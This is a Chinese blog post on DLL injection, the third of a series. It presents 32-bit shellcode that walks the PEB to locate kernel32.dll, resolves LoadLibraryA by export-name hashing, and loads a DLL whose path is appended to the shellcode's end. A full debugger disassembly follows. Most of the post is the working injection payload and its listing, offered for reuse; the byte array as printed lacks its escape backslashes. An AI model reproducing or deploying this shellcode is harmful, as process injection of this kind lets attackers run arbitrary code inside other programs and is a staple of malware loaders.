DLL注入技术之三注入shellcode

DLL注入技术之三注入shellcode

以前两篇博客使用的注入方式都是远程调用了函数:LoadLibraryA,现在使用一种方法是写入一段shellcode然后远程运行它，shellcode会先从peb链表中找到kernel32.dll,然后查找其导出表，找到LoadLibraryA这个函数并调用，以达到加载DLL的目的。

我这里有32位的shellcode与64位的shellcode,都是久经考验过的代码。

现在我们可以一起分析一下32位的shellcode:

unsigned char shellcode[] = "x9cx60xebx42x8Bx59x3Cx8Bx5Cx0Bx78x03xD9x8Bx73"
"x20x03xF1x33xFFx4Fx47xADx33xEDx0FxB6x14x01x38"
"xF2x74x08xC1xCDx03x03xEAx40xEBxF0x3Bx6Cx24x04"
"x75xE6x8Bx73x24x03xF1x66x8Bx3Cx7Ex8Bx73x1Cx03"
"xF1x8Bx04xBEx03xC1x5Bx5Fx53xC3x33xD2x64x33x52"
"x30x8Bx52x0Cx8Bx52x1Cx8Bx4ax08x8Bx72x20x8Bx12"
"x80x7Ex0Cx33x75xF2x68x54x12x81x20xe8x99xffxff"
"xffxebx0bxffxd0x61x9dx90x90x90x90x90x90x90"   //此处x90可以写一个jmp或ret,偏移为:0x70
"xe8xf0xffxffxff"
"d:\dlltest.dll";

我们把这段shellcode放在调试器中：

0026CA40 >  9C              pushfd
0026CA41    60              pushad
0026CA42    EB 42           jmp     short 0026CA86
0026CA44    8B59 3C         mov     ebx, dword ptr [ecx+3C]
0026CA47    8B5C0B 78       mov     ebx, dword ptr [ebx+ecx+78]
0026CA4B    03D9            add     ebx, ecx
0026CA4D    8B73 20         mov     esi, dword ptr [ebx+20]
0026CA50    03F1            add     esi, ecx
0026CA52    33FF            xor     edi, edi
0026CA54    4F              dec     edi
0026CA55    47              inc     edi
0026CA56    AD              lods    dword ptr [esi]
0026CA57    33ED            xor     ebp, ebp
0026CA59    0FB61401        movzx   edx, byte ptr [ecx+eax]
0026CA5D    38F2            cmp     dl, dh
0026CA5F    74 08           je      short 0026CA69
0026CA61    C1CD 03         ror     ebp, 3
0026CA64    03EA            add     ebp, edx
0026CA66    40              inc     eax
0026CA67  ^ EB F0           jmp     short 0026CA59
0026CA69    3B6C24 04       cmp     ebp, dword ptr [esp+4]
0026CA6D  ^ 75 E6           jnz     short 0026CA55
0026CA6F    8B73 24         mov     esi, dword ptr [ebx+24]
0026CA72    03F1            add     esi, ecx
0026CA74    66:8B3C7E       mov     di, word ptr [esi+edi*2]
0026CA78    8B73 1C         mov     esi, dword ptr [ebx+1C]
0026CA7B    03F1            add     esi, ecx
0026CA7D    8B04BE          mov     eax, dword ptr [esi+edi*4]
0026CA80    03C1            add     eax, ecx
0026CA82    5B              pop     ebx
0026CA83    5F              pop     edi
0026CA84    53              push    ebx
0026CA85    C3              retn
0026CA86    33D2            xor     edx, edx
0026CA88    64:3352 30      xor     edx, dword ptr fs:[edx+30]
0026CA8C    8B52 0C         mov     edx, dword ptr [edx+C]
0026CA8F    8B52 1C         mov     edx, dword ptr [edx+1C]
0026CA92    8B4A 08         mov     ecx, dword ptr [edx+8]
0026CA95    8B72 20         mov     esi, dword ptr [edx+20]
0026CA98    8B12            mov     edx, dword ptr [edx]
0026CA9A    807E 0C 33      cmp     byte ptr [esi+C], 33
0026CA9E  ^ 75 F2           jnz     short 0026CA92
0026CAA0    68 54128120     push    20811254
0026CAA5    E8 99FFFFFF     call    0026CA43
0026CAAA    EB 0B           jmp     short 0026CAB7
0026CAAC    FFD0            call    eax
0026CAAE    61              popad
0026CAAF    9D              popfd
0026CAB0    90              nop
0026CAB1    90              nop
0026CAB2    90              nop
0026CAB3    90              nop
0026CAB4    90              nop
0026CAB5    90              nop
0026CAB6    90              nop
0026CAB7    E8 F0FFFFFF     call    0026CAAC
0026CABC    64:3A5C64 6C    cmp     bl, byte ptr fs:[esp+6C]
0026CAC1    6C              ins     byte ptr es:[edi], dx
0026CAC2    74 65           je      short 0026CB29
0026CAC4    73 74           jnb     short 0026CB3A
0026CAC6    2E:             prefix cs:
0026CAC7    64:6C           ins     byte ptr es:[edi], dx
0026CAC9    6C              ins     byte ptr es:[edi], dx
0026CACA    0000            add     byte ptr [eax], al

要讲的是我把dll的路径字符串配置到了shellcode的尾部，这样改动dll的路径时可以不用变动shellcode。

大家如果遇到有使用不便的地方，可以加我的QQ:403887828